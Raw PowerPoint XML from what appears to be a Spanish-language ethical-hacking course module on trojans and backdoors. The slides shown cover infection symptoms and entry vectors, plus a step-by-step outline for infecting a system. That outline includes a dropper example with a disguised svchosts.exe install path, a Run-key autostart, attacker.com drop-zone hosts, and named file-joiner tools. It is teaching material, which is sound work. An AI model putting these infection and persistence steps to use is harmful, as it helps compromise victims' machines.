          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1695946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Indicaciones de ataque troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>El DVD se abre o cierra solo, navegador se redirige solo, antivirus se deshabilita, la barra de tareas desaparece, extrañas cajas aparecen, el color del S.O. cambia, contraseñas cambiadas sin autorización, la pantalla se vuelve extraña, cambia la configuración del fondo de pantalla o protector de pantalla. IPS se queja de que el IP del equipo está haciendo escaneos. Compras extrañas en la tarjeta de crédito. Inversión en los botones del mouse. Que la gente sepa mucha información personal de una victima. El monitor se enciende y apaga solo. Documentos y mensajes se imprimen solos. El puntero del mouse desaparece o mueve solo. El equipo se apaga solo. Ctrl Alt Surp no funciona.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25270837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050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2679055"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>¡Muchas Gracias!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3961414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Infectando un sistema con un Troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>1. Crear un nuevo troyano utilizando un Trojan Horse Construction Kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>2. Crear un dropper, que es parte de un paquete troyanizado que instala el código malicioso en el sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Ejemplo de dropper: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Ruta de instalación: C:\Windows\system32\svchosts.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Autostart:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>HKLM\Software\Micr....\run\Iexplorer.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Código Malicioso:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Client address: cliente.attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Dropzone: dropzone.attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Wrapper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>File name: my_name.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Wrapper data: Graphic file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625726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Infectando un sistema con un Troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Crear un wrapper utilizando herramientas para instalar el troyano en el equipo de la victima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Propagar el troyano (generalmente se contagian las redes P2P como el kazaa)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. Ejecutar el dropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Ejecutar la damage routine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2010081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Wrapper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Une un troyano ejecutable a una aplicación .exe con aspecto inocente, como juegos, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Cuando la víctima ejecuta el .exe, primero se instala el troyano en background y luego ejecuta la aplicación wrapping en foreground.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ambos programas están unidos dentro de un archivo simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ejemplos de wrapper conver programs. Kriptomatik. Advanced file joiner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17330166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¿Cómo un troyano puede entrar a un sistema?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Programa falso. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Descargando archivos, juegos, programas, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Sitios de descarga de software freeware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>NetBIOS (filesharing). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Aplicaciones Instant Messenger. IRC. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Archivos adjuntos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Acceso físico. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Bugs en mails y navegadores.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2141652558"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Blue-Grey-PowerPoint-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Technology-PowerPoint-Template</Template>
  <TotalTime>39</TotalTime>
  <Words>2452</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>209</Paragraphs>
  <Slides>50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50</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="54" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Microsoft New Tai Lue</vt:lpstr>
      <vt:lpstr>Blue-Grey-PowerPoint-Template</vt:lpstr>
      <vt:lpstr>6. Troyanos y Backdoors</vt:lpstr>
      <vt:lpstr>Troyanos</vt:lpstr>
      <vt:lpstr>Su propósito</vt:lpstr>
      <vt:lpstr>Su propósito</vt:lpstr>
      <vt:lpstr>Indicaciones de ataque troyano</vt:lpstr>
      <vt:lpstr>Infectando un sistema con un Troyano</vt:lpstr>
      <vt:lpstr>Infectando un sistema con un Troyano</vt:lpstr>
      <vt:lpstr>Wrapper</vt:lpstr>
      <vt:lpstr>¿Cómo un troyano puede entrar a un sistema?</vt:lpstr>
      <vt:lpstr>Desplegar un troyano</vt:lpstr>
      <vt:lpstr>Técnicas para evadir antivirus.</vt:lpstr>
      <vt:lpstr>Tipos de troyanos</vt:lpstr>
      <vt:lpstr>Troyanos Command Shell</vt:lpstr>
      <vt:lpstr>Ejemplo con netcat</vt:lpstr>
      <vt:lpstr>Troyanos Botnet</vt:lpstr>
      <vt:lpstr>Troyanos Proxy Server</vt:lpstr>
      <vt:lpstr>Troyanos FTP</vt:lpstr>
      <vt:lpstr>Troyanos VNC </vt:lpstr>
      <vt:lpstr>Troyanos HTTP/HTTPS</vt:lpstr>
      <vt:lpstr>Troyanos ICMP</vt:lpstr>
      <vt:lpstr>Troyanos de acceso remoto</vt:lpstr>
      <vt:lpstr>Troyanos CCTT (Covert Channel Tunneling Trojan)</vt:lpstr>
      <vt:lpstr>Troyanos E-banking</vt:lpstr>
      <vt:lpstr>Troyanos destructivos</vt:lpstr>
      <vt:lpstr>Troyanos de notificación</vt:lpstr>
      <vt:lpstr>Troyanos de tarjetas de crédito</vt:lpstr>
      <vt:lpstr>Troyanos Data Hiding (Troyanos encriptados)</vt:lpstr>
      <vt:lpstr>Troyano de Blakberry: PhoneSnoop</vt:lpstr>
      <vt:lpstr>Troyano MAC OS X: DNSChanger</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Test de Intrusión para Troyanos</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>¡Muchas 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Julio</dc:creator>
  <cp:lastModifiedBy>Julio Iglesias Pérez</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-09T01:50:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-22T06:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>